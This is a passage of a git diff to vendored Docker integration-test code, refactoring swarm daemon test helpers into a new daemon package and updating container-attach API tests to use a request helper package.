+		time.Sleep(100 * time.Millisecond)
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/daemon/daemon_swarm.go b/vendor/github.com/docker/docker/integration-cli/daemon/daemon_swarm.go
new file mode 100644
index 0000000000..4a6ce8a5c5
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/daemon/daemon_swarm.go
@@ -0,0 +1,197 @@
+package daemon // import "github.com/docker/docker/integration-cli/daemon"
+
+import (
+	"context"
+	"fmt"
+	"strings"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/client"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/go-check/check"
+	"gotest.tools/assert"
+)
+
+// CheckServiceTasksInState returns the number of tasks with a matching state,
+// and optional message substring.
+func (d *Daemon) CheckServiceTasksInState(service string, state swarm.TaskState, message string) func(*check.C) (interface{}, check.CommentInterface) {
+	return func(c *check.C) (interface{}, check.CommentInterface) {
+		tasks := d.GetServiceTasks(c, service)
+		var count int
+		for _, task := range tasks {
+			if task.Status.State == state {
+				if message == "" || strings.Contains(task.Status.Message, message) {
+					count++
+				}
+			}
+		}
+		return count, nil
+	}
+}
+
+// CheckServiceTasksInStateWithError returns the number of tasks with a matching state,
+// and optional message substring.
+func (d *Daemon) CheckServiceTasksInStateWithError(service string, state swarm.TaskState, errorMessage string) func(*check.C) (interface{}, check.CommentInterface) {
+	return func(c *check.C) (interface{}, check.CommentInterface) {
+		tasks := d.GetServiceTasks(c, service)
+		var count int
+		for _, task := range tasks {
+			if task.Status.State == state {
+				if errorMessage == "" || strings.Contains(task.Status.Err, errorMessage) {
+					count++
+				}
+			}
+		}
+		return count, nil
+	}
+}
+
+// CheckServiceRunningTasks returns the number of running tasks for the specified service
+func (d *Daemon) CheckServiceRunningTasks(service string) func(*check.C) (interface{}, check.CommentInterface) {
+	return d.CheckServiceTasksInState(service, swarm.TaskStateRunning, "")
+}
+
+// CheckServiceUpdateState returns the current update state for the specified service
+func (d *Daemon) CheckServiceUpdateState(service string) func(*check.C) (interface{}, check.CommentInterface) {
+	return func(c *check.C) (interface{}, check.CommentInterface) {
+		service := d.GetService(c, service)
+		if service.UpdateStatus == nil {
+			return "", nil
+		}
+		return service.UpdateStatus.State, nil
+	}
+}
+
+// CheckPluginRunning returns the runtime state of the plugin
+func (d *Daemon) CheckPluginRunning(plugin string) func(c *check.C) (interface{}, check.CommentInterface) {
+	return func(c *check.C) (interface{}, check.CommentInterface) {
+		apiclient, err := d.NewClient()
+		assert.NilError(c, err)
+		resp, _, err := apiclient.PluginInspectWithRaw(context.Background(), plugin)
+		if client.IsErrNotFound(err) {
+			return false, check.Commentf("%v", err)
+		}
+		assert.NilError(c, err)
+		return resp.Enabled, check.Commentf("%+v", resp)
+	}
+}
+
+// CheckPluginImage returns the runtime state of the plugin
+func (d *Daemon) CheckPluginImage(plugin string) func(c *check.C) (interface{}, check.CommentInterface) {
+	return func(c *check.C) (interface{}, check.CommentInterface) {
+		apiclient, err := d.NewClient()
+		assert.NilError(c, err)
+		resp, _, err := apiclient.PluginInspectWithRaw(context.Background(), plugin)
+		if client.IsErrNotFound(err) {
+			return false, check.Commentf("%v", err)
+		}
+		assert.NilError(c, err)
+		return resp.PluginReference, check.Commentf("%+v", resp)
+	}
+}
+
+// CheckServiceTasks returns the number of tasks for the specified service
+func (d *Daemon) CheckServiceTasks(service string) func(*check.C) (interface{}, check.CommentInterface) {
+	return func(c *check.C) (interface{}, check.CommentInterface) {
+		tasks := d.GetServiceTasks(c, service)
+		return len(tasks), nil
+	}
+}
+
+// CheckRunningTaskNetworks returns the number of times each network is referenced from a task.
+func (d *Daemon) CheckRunningTaskNetworks(c *check.C) (interface{}, check.CommentInterface) {
+	cli, err := d.NewClient()
+	c.Assert(err, checker.IsNil)
+	defer cli.Close()
+
+	filterArgs := filters.NewArgs()
+	filterArgs.Add("desired-state", "running")
+
+	options := types.TaskListOptions{
+		Filters: filterArgs,
+	}
+
+	tasks, err := cli.TaskList(context.Background(), options)
+	c.Assert(err, checker.IsNil)
+
+	result := make(map[string]int)
+	for _, task := range tasks {
+		for _, network := range task.Spec.Networks {
+			result[network.Target]++
+		}
+	}
+	return result, nil
+}
+
+// CheckRunningTaskImages returns the times each image is running as a task.
+func (d *Daemon) CheckRunningTaskImages(c *check.C) (interface{}, check.CommentInterface) {
+	cli, err := d.NewClient()
+	c.Assert(err, checker.IsNil)
+	defer cli.Close()
+
+	filterArgs := filters.NewArgs()
+	filterArgs.Add("desired-state", "running")
+
+	options := types.TaskListOptions{
+		Filters: filterArgs,
+	}
+
+	tasks, err := cli.TaskList(context.Background(), options)
+	c.Assert(err, checker.IsNil)
+
+	result := make(map[string]int)
+	for _, task := range tasks {
+		if task.Status.State == swarm.TaskStateRunning && task.Spec.ContainerSpec != nil {
+			result[task.Spec.ContainerSpec.Image]++
+		}
+	}
+	return result, nil
+}
+
+// CheckNodeReadyCount returns the number of ready node on the swarm
+func (d *Daemon) CheckNodeReadyCount(c *check.C) (interface{}, check.CommentInterface) {
+	nodes := d.ListNodes(c)
+	var readyCount int
+	for _, node := range nodes {
+		if node.Status.State == swarm.NodeStateReady {
+			readyCount++
+		}
+	}
+	return readyCount, nil
+}
+
+// CheckLocalNodeState returns the current swarm node state
+func (d *Daemon) CheckLocalNodeState(c *check.C) (interface{}, check.CommentInterface) {
+	info := d.SwarmInfo(c)
+	return info.LocalNodeState, nil
+}
+
+// CheckControlAvailable returns the current swarm control available
+func (d *Daemon) CheckControlAvailable(c *check.C) (interface{}, check.CommentInterface) {
+	info := d.SwarmInfo(c)
+	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive)
+	return info.ControlAvailable, nil
+}
+
+// CheckLeader returns whether there is a leader on the swarm or not
+func (d *Daemon) CheckLeader(c *check.C) (interface{}, check.CommentInterface) {
+	cli, err := d.NewClient()
+	c.Assert(err, checker.IsNil)
+	defer cli.Close()
+
+	errList := check.Commentf("could not get node list")
+
+	ls, err := cli.NodeList(context.Background(), types.NodeListOptions{})
+	if err != nil {
+		return err, errList
+	}
+
+	for _, node := range ls {
+		if node.ManagerStatus != nil && node.ManagerStatus.Leader {
+			return nil, nil
+		}
+	}
+	return fmt.Errorf("no leader"), check.Commentf("could not find leader")
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/daemon_swarm.go b/vendor/github.com/docker/docker/integration-cli/daemon_swarm.go
deleted file mode 100644
index 199bce0e7b..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/daemon_swarm.go
+++ /dev/null
@@ -1,419 +0,0 @@
-package main
-
-import (
-	"encoding/json"
-	"fmt"
-	"net/http"
-	"strings"
-	"time"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/api/types/filters"
-	"github.com/docker/docker/api/types/swarm"
-	"github.com/docker/docker/pkg/integration/checker"
-	"github.com/go-check/check"
-)
-
-// SwarmDaemon is a test daemon with helpers for participating in a swarm.
-type SwarmDaemon struct {
-	*Daemon
-	swarm.Info
-	port       int
-	listenAddr string
-}
-
-// Init initializes a new swarm cluster.
-func (d *SwarmDaemon) Init(req swarm.InitRequest) error {
-	if req.ListenAddr == "" {
-		req.ListenAddr = d.listenAddr
-	}
-	status, out, err := d.SockRequest("POST", "/swarm/init", req)
-	if status != http.StatusOK {
-		return fmt.Errorf("initializing swarm: invalid statuscode %v, %q", status, out)
-	}
-	if err != nil {
-		return fmt.Errorf("initializing swarm: %v", err)
-	}
-	info, err := d.info()
-	if err != nil {
-		return err
-	}
-	d.Info = info
-	return nil
-}
-
-// Join joins a daemon to an existing cluster.
-func (d *SwarmDaemon) Join(req swarm.JoinRequest) error {
-	if req.ListenAddr == "" {
-		req.ListenAddr = d.listenAddr
-	}
-	status, out, err := d.SockRequest("POST", "/swarm/join", req)
-	if status != http.StatusOK {
-		return fmt.Errorf("joining swarm: invalid statuscode %v, %q", status, out)
-	}
-	if err != nil {
-		return fmt.Errorf("joining swarm: %v", err)
-	}
-	info, err := d.info()
-	if err != nil {
-		return err
-	}
-	d.Info = info
-	return nil
-}
-
-// Leave forces daemon to leave current cluster.
-func (d *SwarmDaemon) Leave(force bool) error {
-	url := "/swarm/leave"
-	if force {
-		url += "?force=1"
-	}
-	status, out, err := d.SockRequest("POST", url, nil)
-	if status != http.StatusOK {
-		return fmt.Errorf("leaving swarm: invalid statuscode %v, %q", status, out)
-	}
-	if err != nil {
-		err = fmt.Errorf("leaving swarm: %v", err)
-	}
-	return err
-}
-
-func (d *SwarmDaemon) info() (swarm.Info, error) {
-	var info struct {
-		Swarm swarm.Info
-	}
-	status, dt, err := d.SockRequest("GET", "/info", nil)
-	if status != http.StatusOK {
-		return info.Swarm, fmt.Errorf("get swarm info: invalid statuscode %v", status)
-	}
-	if err != nil {
-		return info.Swarm, fmt.Errorf("get swarm info: %v", err)
-	}
-	if err := json.Unmarshal(dt, &info); err != nil {
-		return info.Swarm, err
-	}
-	return info.Swarm, nil
-}
-
-type serviceConstructor func(*swarm.Service)
-type nodeConstructor func(*swarm.Node)
-type specConstructor func(*swarm.Spec)
-
-func (d *SwarmDaemon) createService(c *check.C, f ...serviceConstructor) string {
-	var service swarm.Service
-	for _, fn := range f {
-		fn(&service)
-	}
-	status, out, err := d.SockRequest("POST", "/services/create", service.Spec)
-
-	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
-	c.Assert(status, checker.Equals, http.StatusCreated, check.Commentf("output: %q", string(out)))
-
-	var scr types.ServiceCreateResponse
-	c.Assert(json.Unmarshal(out, &scr), checker.IsNil)
-	return scr.ID
-}
-
-func (d *SwarmDaemon) getService(c *check.C, id string) *swarm.Service {
-	var service swarm.Service
-	status, out, err := d.SockRequest("GET", "/services/"+id, nil)
-	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
-	c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out)))
-	c.Assert(json.Unmarshal(out, &service), checker.IsNil)
-	return &service
-}
-
-func (d *SwarmDaemon) getServiceTasks(c *check.C, service string) []swarm.Task {
-	var tasks []swarm.Task
-
-	filterArgs := filters.NewArgs()
-	filterArgs.Add("desired-state", "running")
-	filterArgs.Add("service", service)
-	filters, err := filters.ToParam(filterArgs)
-	c.Assert(err, checker.IsNil)
-
-	status, out, err := d.SockRequest("GET", "/tasks?filters="+filters, nil)
-	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
-	c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out)))
-	c.Assert(json.Unmarshal(out, &tasks), checker.IsNil)
-	return tasks
-}
-
-func (d *SwarmDaemon) checkServiceTasksInState(service string, state swarm.TaskState, message string) func(*check.C) (interface{}, check.CommentInterface) {
-	return func(c *check.C) (interface{}, check.CommentInterface) {
-		tasks := d.getServiceTasks(c, service)
-		var count int
-		for _, task := range tasks {
-			if task.Status.State == state {
-				if message == "" || strings.Contains(task.Status.Message, message) {
-					count++
-				}
-			}
-		}
-		return count, nil
-	}
-}
-
-func (d *SwarmDaemon) checkServiceRunningTasks(service string) func(*check.C) (interface{}, check.CommentInterface) {
-	return d.checkServiceTasksInState(service, swarm.TaskStateRunning, "")
-}
-
-func (d *SwarmDaemon) checkServiceUpdateState(service string) func(*check.C) (interface{}, check.CommentInterface) {
-	return func(c *check.C) (interface{}, check.CommentInterface) {
-		service := d.getService(c, service)
-		return service.UpdateStatus.State, nil
-	}
-}
-
-func (d *SwarmDaemon) checkServiceTasks(service string) func(*check.C) (interface{}, check.CommentInterface) {
-	return func(c *check.C) (interface{}, check.CommentInterface) {
-		tasks := d.getServiceTasks(c, service)
-		return len(tasks), nil
-	}
-}
-
-func (d *SwarmDaemon) checkRunningTaskImages(c *check.C) (interface{}, check.CommentInterface) {
-	var tasks []swarm.Task
-
-	filterArgs := filters.NewArgs()
-	filterArgs.Add("desired-state", "running")
-	filters, err := filters.ToParam(filterArgs)
-	c.Assert(err, checker.IsNil)
-
-	status, out, err := d.SockRequest("GET", "/tasks?filters="+filters, nil)
-	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
-	c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out)))
-	c.Assert(json.Unmarshal(out, &tasks), checker.IsNil)
-
-	result := make(map[string]int)
-	for _, task := range tasks {
-		if task.Status.State == swarm.TaskStateRunning {
-			result[task.Spec.ContainerSpec.Image]++
-		}
-	}
-	return result, nil
-}
-
-func (d *SwarmDaemon) checkNodeReadyCount(c *check.C) (interface{}, check.CommentInterface) {
-	nodes := d.listNodes(c)
-	var readyCount int
-	for _, node := range nodes {
-		if node.Status.State == swarm.NodeStateReady {
-			readyCount++
-		}
-	}
-	return readyCount, nil
-}
-
-func (d *SwarmDaemon) getTask(c *check.C, id string) swarm.Task {
-	var task swarm.Task
-
-	status, out, err := d.SockRequest("GET", "/tasks/"+id, nil)
-	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
-	c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out)))
-	c.Assert(json.Unmarshal(out, &task), checker.IsNil)
-	return task
-}
-
-func (d *SwarmDaemon) updateService(c *check.C, service *swarm.Service, f ...serviceConstructor) {
-	for _, fn := range f {
-		fn(service)
-	}
-	url := fmt.Sprintf("/services/%s/update?version=%d", service.ID, service.Version.Index)
-	status, out, err := d.SockRequest("POST", url, service.Spec)
-	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
-	c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out)))
-}
-
-func (d *SwarmDaemon) removeService(c *check.C, id string) {
-	status, out, err := d.SockRequest("DELETE", "/services/"+id, nil)
-	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
-	c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out)))
-}
-
-func (d *SwarmDaemon) getNode(c *check.C, id string) *swarm.Node {
-	var node swarm.Node
-	status, out, err := d.SockRequest("GET", "/nodes/"+id, nil)
-	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
-	c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out)))
-	c.Assert(json.Unmarshal(out, &node), checker.IsNil)
-	c.Assert(node.ID, checker.Equals, id)
-	return &node
-}
-
-func (d *SwarmDaemon) removeNode(c *check.C, id string, force bool) {
-	url := "/nodes/" + id
-	if force {
-		url += "?force=1"
-	}
-
-	status, out, err := d.SockRequest("DELETE", url, nil)
-	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
-	c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out)))
-}
-
-func (d *SwarmDaemon) updateNode(c *check.C, id string, f ...nodeConstructor) {
-	for i := 0; ; i++ {
-		node := d.getNode(c, id)
-		for _, fn := range f {
-			fn(node)
-		}
-		url := fmt.Sprintf("/nodes/%s/update?version=%d", node.ID, node.Version.Index)
-		status, out, err := d.SockRequest("POST", url, node.Spec)
-		if i < 10 && strings.Contains(string(out), "update out of sequence") {
-			time.Sleep(100 * time.Millisecond)
-			continue
-		}
-		c.Assert(err, checker.IsNil, check.Commentf(string(out)))
-		c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out)))
-		return
-	}
-}
-
-func (d *SwarmDaemon) listNodes(c *check.C) []swarm.Node {
-	status, out, err := d.SockRequest("GET", "/nodes", nil)
-	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
-	c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out)))
-
-	nodes := []swarm.Node{}
-	c.Assert(json.Unmarshal(out, &nodes), checker.IsNil)
-	return nodes
-}
-
-func (d *SwarmDaemon) listServices(c *check.C) []swarm.Service {
-	status, out, err := d.SockRequest("GET", "/services", nil)
-	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
-	c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out)))
-
-	services := []swarm.Service{}
-	c.Assert(json.Unmarshal(out, &services), checker.IsNil)
-	return services
-}
-
-func (d *SwarmDaemon) createSecret(c *check.C, secretSpec swarm.SecretSpec) string {
-	status, out, err := d.SockRequest("POST", "/secrets/create", secretSpec)
-
-	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
-	c.Assert(status, checker.Equals, http.StatusCreated, check.Commentf("output: %q", string(out)))
-
-	var scr types.SecretCreateResponse
-	c.Assert(json.Unmarshal(out, &scr), checker.IsNil)
-	return scr.ID
-}
-
-func (d *SwarmDaemon) listSecrets(c *check.C) []swarm.Secret {
-	status, out, err := d.SockRequest("GET", "/secrets", nil)
-	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
-	c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out)))
-
-	secrets := []swarm.Secret{}
-	c.Assert(json.Unmarshal(out, &secrets), checker.IsNil)
-	return secrets
-}
-
-func (d *SwarmDaemon) getSecret(c *check.C, id string) *swarm.Secret {
-	var secret swarm.Secret
-	status, out, err := d.SockRequest("GET", "/secrets/"+id, nil)
-	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
-	c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out)))
-	c.Assert(json.Unmarshal(out, &secret), checker.IsNil)
-	return &secret
-}
-
-func (d *SwarmDaemon) deleteSecret(c *check.C, id string) {
-	status, out, err := d.SockRequest("DELETE", "/secrets/"+id, nil)
-	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
-	c.Assert(status, checker.Equals, http.StatusNoContent, check.Commentf("output: %q", string(out)))
-}
-
-func (d *SwarmDaemon) getSwarm(c *check.C) swarm.Swarm {
-	var sw swarm.Swarm
-	status, out, err := d.SockRequest("GET", "/swarm", nil)
-	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
-	c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out)))
-	c.Assert(json.Unmarshal(out, &sw), checker.IsNil)
-	return sw
-}
-
-func (d *SwarmDaemon) updateSwarm(c *check.C, f ...specConstructor) {
-	sw := d.getSwarm(c)
-	for _, fn := range f {
-		fn(&sw.Spec)
-	}
-	url := fmt.Sprintf("/swarm/update?version=%d", sw.Version.Index)
-	status, out, err := d.SockRequest("POST", url, sw.Spec)
-	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
-	c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out)))
-}
-
-func (d *SwarmDaemon) rotateTokens(c *check.C) {
-	var sw swarm.Swarm
-	status, out, err := d.SockRequest("GET", "/swarm", nil)
-	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
-	c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out)))
-	c.Assert(json.Unmarshal(out, &sw), checker.IsNil)
-
-	url := fmt.Sprintf("/swarm/update?version=%d&rotateWorkerToken=true&rotateManagerToken=true", sw.Version.Index)
-	status, out, err = d.SockRequest("POST", url, sw.Spec)
-	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
-	c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out)))
-}
-
-func (d *SwarmDaemon) joinTokens(c *check.C) swarm.JoinTokens {
-	var sw swarm.Swarm
-	status, out, err := d.SockRequest("GET", "/swarm", nil)
-	c.Assert(err, checker.IsNil, check.Commentf(string(out)))
-	c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out)))
-	c.Assert(json.Unmarshal(out, &sw), checker.IsNil)
-	return sw.JoinTokens
-}
-
-func (d *SwarmDaemon) checkLocalNodeState(c *check.C) (interface{}, check.CommentInterface) {
-	info, err := d.info()
-	c.Assert(err, checker.IsNil)
-	return info.LocalNodeState, nil
-}
-
-func (d *SwarmDaemon) checkControlAvailable(c *check.C) (interface{}, check.CommentInterface) {
-	info, err := d.info()
-	c.Assert(err, checker.IsNil)
-	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive)
-	return info.ControlAvailable, nil
-}
-
-func (d *SwarmDaemon) checkLeader(c *check.C) (interface{}, check.CommentInterface) {
-	errList := check.Commentf("could not get node list")
-	status, out, err := d.SockRequest("GET", "/nodes", nil)
-	if err != nil {
-		return err, errList
-	}
-	if status != http.StatusOK {
-		return fmt.Errorf("expected http status OK, got: %d", status), errList
-	}
-
-	var ls []swarm.Node
-	if err := json.Unmarshal(out, &ls); err != nil {
-		return err, errList
-	}
-
-	for _, node := range ls {
-		if node.ManagerStatus != nil && node.ManagerStatus.Leader {
-			return nil, nil
-		}
-	}
-	return fmt.Errorf("no leader"), check.Commentf("could not find leader")
-}
-
-func (d *SwarmDaemon) cmdRetryOutOfSequence(args ...string) (string, error) {
-	for i := 0; ; i++ {
-		out, err := d.Cmd(args...)
-		if err != nil {
-			if strings.Contains(out, "update out of sequence") {
-				if i < 10 {
-					continue
-				}
-			}
-		}
-		return out, err
-	}
-}
diff --git a/vendor/github.com/docker/docker/integration-cli/daemon_swarm_hack.go b/vendor/github.com/docker/docker/integration-cli/daemon_swarm_hack_test.go
similarity index 77%
rename from vendor/github.com/docker/docker/integration-cli/daemon_swarm_hack.go
rename to vendor/github.com/docker/docker/integration-cli/daemon_swarm_hack_test.go
index 0cea901420..7a23e84bfc 100644
--- a/vendor/github.com/docker/docker/integration-cli/daemon_swarm_hack.go
+++ b/vendor/github.com/docker/docker/integration-cli/daemon_swarm_hack_test.go
@@ -1,12 +1,15 @@
 package main
 
-import "github.com/go-check/check"
+import (
+	"github.com/docker/docker/integration-cli/daemon"
+	"github.com/go-check/check"
+)
 
-func (s *DockerSwarmSuite) getDaemon(c *check.C, nodeID string) *SwarmDaemon {
+func (s *DockerSwarmSuite) getDaemon(c *check.C, nodeID string) *daemon.Daemon {
 	s.daemonsLock.Lock()
 	defer s.daemonsLock.Unlock()
 	for _, d := range s.daemons {
-		if d.NodeID == nodeID {
+		if d.NodeID() == nodeID {
 			return d
 		}
 	}
diff --git a/vendor/github.com/docker/docker/integration-cli/daemon_unix.go b/vendor/github.com/docker/docker/integration-cli/daemon_unix.go
deleted file mode 100644
index 6ca7daf21c..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/daemon_unix.go
+++ /dev/null
@@ -1,35 +0,0 @@
-// +build !windows
-
-package main
-
-import (
-	"os"
-	"path/filepath"
-	"syscall"
-
-	"github.com/go-check/check"
-)
-
-func cleanupExecRoot(c *check.C, execRoot string) {
-	// Cleanup network namespaces in the exec root of this
-	// daemon because this exec root is specific to this
-	// daemon instance and has no chance of getting
-	// cleaned up when a new daemon is instantiated with a
-	// new exec root.
-	netnsPath := filepath.Join(execRoot, "netns")
-	filepath.Walk(netnsPath, func(path string, info os.FileInfo, err error) error {
-		if err := syscall.Unmount(path, syscall.MNT_FORCE); err != nil {
-			c.Logf("unmount of %s failed: %v", path, err)
-		}
-		os.Remove(path)
-		return nil
-	})
-}
-
-func signalDaemonDump(pid int) {
-	syscall.Kill(pid, syscall.SIGQUIT)
-}
-
-func signalDaemonReload(pid int) error {
-	return syscall.Kill(pid, syscall.SIGHUP)
-}
diff --git a/vendor/github.com/docker/docker/integration-cli/daemon_windows.go b/vendor/github.com/docker/docker/integration-cli/daemon_windows.go
deleted file mode 100644
index 885b703b33..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/daemon_windows.go
+++ /dev/null
@@ -1,53 +0,0 @@
-package main
-
-import (
-	"fmt"
-	"strconv"
-	"syscall"
-	"unsafe"
-
-	"github.com/go-check/check"
-	"golang.org/x/sys/windows"
-)
-
-func openEvent(desiredAccess uint32, inheritHandle bool, name string, proc *windows.LazyProc) (handle syscall.Handle, err error) {
-	namep, _ := syscall.UTF16PtrFromString(name)
-	var _p2 uint32
-	if inheritHandle {
-		_p2 = 1
-	}
-	r0, _, e1 := proc.Call(uintptr(desiredAccess), uintptr(_p2), uintptr(unsafe.Pointer(namep)))
-	handle = syscall.Handle(r0)
-	if handle == syscall.InvalidHandle {
-		err = e1
-	}
-	return
-}
-
-func pulseEvent(handle syscall.Handle, proc *windows.LazyProc) (err error) {
-	r0, _, _ := proc.Call(uintptr(handle))
-	if r0 != 0 {
-		err = syscall.Errno(r0)
-	}
-	return
-}
-
-func signalDaemonDump(pid int) {
-	modkernel32 := windows.NewLazySystemDLL("kernel32.dll")
-	procOpenEvent := modkernel32.NewProc("OpenEventW")
-	procPulseEvent := modkernel32.NewProc("PulseEvent")
-
-	ev := "Global\\docker-daemon-" + strconv.Itoa(pid)
-	h2, _ := openEvent(0x0002, false, ev, procOpenEvent)
-	if h2 == 0 {
-		return
-	}
-	pulseEvent(h2, procPulseEvent)
-}
-
-func signalDaemonReload(pid int) error {
-	return fmt.Errorf("daemon reload not supported")
-}
-
-func cleanupExecRoot(c *check.C, execRoot string) {
-}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_attach_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_attach_test.go
index d43bf3ab0e..26633841db 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_api_attach_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_api_attach_test.go
@@ -4,17 +4,21 @@ import (
 	"bufio"
 	"bytes"
 	"context"
+	"fmt"
 	"io"
 	"net"
 	"net/http"
+	"net/http/httputil"
 	"strings"
 	"time"
 
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/client"
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/internal/test/request"
 	"github.com/docker/docker/pkg/stdcopy"
 	"github.com/go-check/check"
+	"github.com/pkg/errors"
 	"golang.org/x/net/websocket"
 )
 
@@ -22,7 +26,7 @@ func (s *DockerSuite) TestGetContainersAttachWebsocket(c *check.C) {
 	testRequires(c, DaemonIsLinux)
 	out, _ := dockerCmd(c, "run", "-dit", "busybox", "cat")
 
-	rwc, err := sockConn(time.Duration(10*time.Second), "")
+	rwc, err := request.SockConn(time.Duration(10*time.Second), daemonHost())
 	c.Assert(err, checker.IsNil)
 
 	cleanedContainerID := strings.TrimSpace(out)
@@ -72,26 +76,24 @@ func (s *DockerSuite) TestGetContainersAttachWebsocket(c *check.C) {
 
 // regression gh14320
 func (s *DockerSuite) TestPostContainersAttachContainerNotFound(c *check.C) {
-	req, client, err := newRequestClient("POST", "/containers/doesnotexist/attach", nil, "", "")
+	resp, _, err := request.Post("/containers/doesnotexist/attach")
 	c.Assert(err, checker.IsNil)
-
-	resp, err := client.Do(req)
 	// connection will shutdown, err should be "persistent connection closed"
-	c.Assert(err, checker.NotNil) // Server shutdown connection
-
-	body, err := readBody(resp.Body)
-	c.Assert(err, checker.IsNil)
 	c.Assert(resp.StatusCode, checker.Equals, http.StatusNotFound)
+	content, err := request.ReadBody(resp.Body)
+	c.Assert(err, checker.IsNil)
 	expected := "No such container: doesnotexist\r\n"
-	c.Assert(string(body), checker.Equals, expected)
+	c.Assert(string(content), checker.Equals, expected)
 }
 
 func (s *DockerSuite) TestGetContainersWsAttachContainerNotFound(c *check.C) {
-	status, body, err := sockRequest("GET", "/containers/doesnotexist/attach/ws", nil)
-	c.Assert(status, checker.Equals, http.StatusNotFound)
+	res, body, err := request.Get("/containers/doesnotexist/attach/ws")
+	c.Assert(res.StatusCode, checker.Equals, http.StatusNotFound)
+	c.Assert(err, checker.IsNil)
+	b, err := request.ReadBody(body)
 	c.Assert(err, checker.IsNil)
 	expected := "No such container: doesnotexist"
-	c.Assert(getErrorMessage(c, body), checker.Contains, expected)
+	c.Assert(getErrorMessage(c, b), checker.Contains, expected)
 }
 
 func (s *DockerSuite) TestPostContainersAttach(c *check.C) {
@@ -139,12 +141,12 @@ func (s *DockerSuite) TestPostContainersAttach(c *check.C) {
 	cid, _ := dockerCmd(c, "run", "-di", "busybox", "cat")
 	cid = strings.TrimSpace(cid)
 	// Attach to the container's stdout stream.
-	conn, br, err := sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stdout=1", nil, "text/plain")
+	conn, br, err := sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stdout=1", nil, "text/plain", daemonHost())
 	c.Assert(err, checker.IsNil)
 	// Check if the data from stdout can be received.
 	expectSuccess(conn, br, "stdout", false)
 	// Attach to the container's stderr stream.
-	conn, br, err = sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stderr=1", nil, "text/plain")
+	conn, br, err = sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stderr=1", nil, "text/plain", daemonHost())
 	c.Assert(err, checker.IsNil)
 	// Since the container only emits stdout, attaching to stderr should return nothing.
 	expectTimeout(conn, br, "stdout")
@@ -152,10 +154,10 @@ func (s *DockerSuite) TestPostContainersAttach(c *check.C) {
 	// Test the similar functions of the stderr stream.
 	cid, _ = dockerCmd(c, "run", "-di", "busybox", "/bin/sh", "-c", "cat >&2")
 	cid = strings.TrimSpace(cid)
-	conn, br, err = sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stderr=1", nil, "text/plain")
+	conn, br, err = sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stderr=1", nil, "text/plain", daemonHost())
 	c.Assert(err, checker.IsNil)
 	expectSuccess(conn, br, "stderr", false)
-	conn, br, err = sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stdout=1", nil, "text/plain")
+	conn, br, err = sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stdout=1", nil, "text/plain", daemonHost())
 	c.Assert(err, checker.IsNil)
 	expectTimeout(conn, br, "stderr")
 
@@ -163,29 +165,32 @@ func (s *DockerSuite) TestPostContainersAttach(c *check.C) {
